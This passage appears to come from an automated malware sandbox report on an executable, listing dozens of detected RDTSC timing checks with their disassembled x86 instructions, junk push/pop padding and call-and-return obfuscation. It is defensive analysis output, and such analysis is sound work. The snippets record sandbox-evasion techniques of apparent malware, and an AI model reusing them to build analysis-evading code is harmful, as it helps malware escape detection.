00000000h 0x0000004d mov dword ptr [ebp+122D1938h], edi 0x00000053 push eax 0x00000054 pushad 0x00000055 jmp 00007FA4C902634Fh 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 587749 second address: 58774D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58A853 second address: 58A858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58A858 second address: 58A887 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C908415Ch 0x00000008 ja 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FA4C9084169h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58A887 second address: 58A88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 587878 second address: 58787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58787C second address: 587880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 587880 second address: 587886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 587886 second address: 587907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12483FF4h], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FA4C9026348h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, 00h 0x0000003b mov eax, dword ptr [ebp+122D05D9h] 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FA4C9026348h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b push FFFFFFFFh 0x0000005d mov ebx, edi 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FA4C9026350h 0x00000069 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 587907 second address: 58790B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58790B second address: 587911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58A9F5 second address: 58A9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58A9FB second address: 58AA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58AA01 second address: 58AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58AA05 second address: 58AA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 58EBCF second address: 58EBD9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593ECB second address: 593ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA4C9026346h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593ED5 second address: 593EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084160h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C908415Bh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593EFA second address: 593EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593EFE second address: 593F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593F0A second address: 593F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026352h 0x00000008 je 00007FA4C9026346h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593F27 second address: 593F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA4C908416Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593AA9 second address: 593ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026352h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 593ABF second address: 593AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA4C908415Ch 0x0000000c jnp 00007FA4C9084156h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 595701 second address: 595719 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5307F8 second address: 530804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA4C9084156h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 596E83 second address: 596E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026355h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 596E9C second address: 596EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 59E3AF second address: 59E3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 59E3B8 second address: 59E3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 59E4B4 second address: 59E4CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C9026352h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A3808 second address: 5A380E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A380E second address: 5A3814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A2AFC second address: 5A2B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FA4C908415Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A3094 second address: 5A30B0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C902634Ah 0x0000000f jne 00007FA4C9026364h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A30B0 second address: 5A30D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084168h 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA4C9084156h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A338A second address: 5A3395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA4C9026346h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A34DD second address: 5A34E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4C9084156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A34E9 second address: 5A350A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9026352h 0x00000008 jmp 00007FA4C902634Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A365B second address: 5A365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A365F second address: 5A3663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5A3663 second address: 5A366E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 52D1AE second address: 52D1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007FA4C9026346h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB2E7 second address: 5AB2EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB2EC second address: 5AB300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA4C902634Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB300 second address: 5AB309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB309 second address: 5AB30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB30F second address: 5AB313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB313 second address: 5AB317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB317 second address: 5AB345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FA4C908417Ch 0x0000000e push esi 0x0000000f jnl 00007FA4C9084156h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA4C9084166h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5791ED second address: 5791F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5792F5 second address: 579302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA4C9084156h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5796BB second address: 5796C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5796C1 second address: 5796C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5796C7 second address: 57971F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026356h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 22FDD2D1h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA4C9026348h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c call 00007FA4C9026349h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA4C902634Bh 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57971F second address: 57972A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FA4C9084156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 579825 second address: 57983B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FA4C9026348h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 579EA1 second address: 579F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jng 00007FA4C9084176h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D31E1h], eax 0x00000015 mov dword ptr [ebp+1247979Bh], edi 0x0000001b push 0000001Eh 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FA4C9084158h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov cx, 5F00h 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 579F06 second address: 579F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A2E9 second address: 57A2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A2ED second address: 57A2F7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A2F7 second address: 57A335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA4C9084162h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jnp 00007FA4C908415Ch 0x00000012 lea eax, dword ptr [ebp+1248EDD6h] 0x00000018 mov dx, 9558h 0x0000001c add dword ptr [ebp+12454E29h], ecx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A335 second address: 57A33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A33B second address: 57A3B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA4C9084158h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1248ED92h] 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FA4C9084158h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 nop 0x00000049 jmp 00007FA4C9084162h 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007FA4C9084156h 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A3B5 second address: 57A3B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 57A3B9 second address: 558617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA4C9084158h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dx, cx 0x00000025 call dword ptr [ebp+122D302Eh] 0x0000002b push edi 0x0000002c pushad 0x0000002d jmp 00007FA4C9084161h 0x00000032 jp 00007FA4C9084156h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 537379 second address: 53737F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53737F second address: 53738F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FA4C9084156h 0x0000000f pop esi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB917 second address: 5AB91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5AB91C second address: 5AB941 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA4C9084170h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABAD3 second address: 5ABADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABADC second address: 5ABAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABAE0 second address: 5ABAF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABF35 second address: 5ABF3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABF3E second address: 5ABF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ABF4D second address: 5ABF55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ADBC1 second address: 5ADBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jl 00007FA4C9026350h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2502 second address: 5B2511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2511 second address: 5B2515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B265A second address: 5B2673 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 jnc 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 js 00007FA4C9084156h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2673 second address: 5B2678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2678 second address: 5B2682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA4C9084156h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2B98 second address: 5B2B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
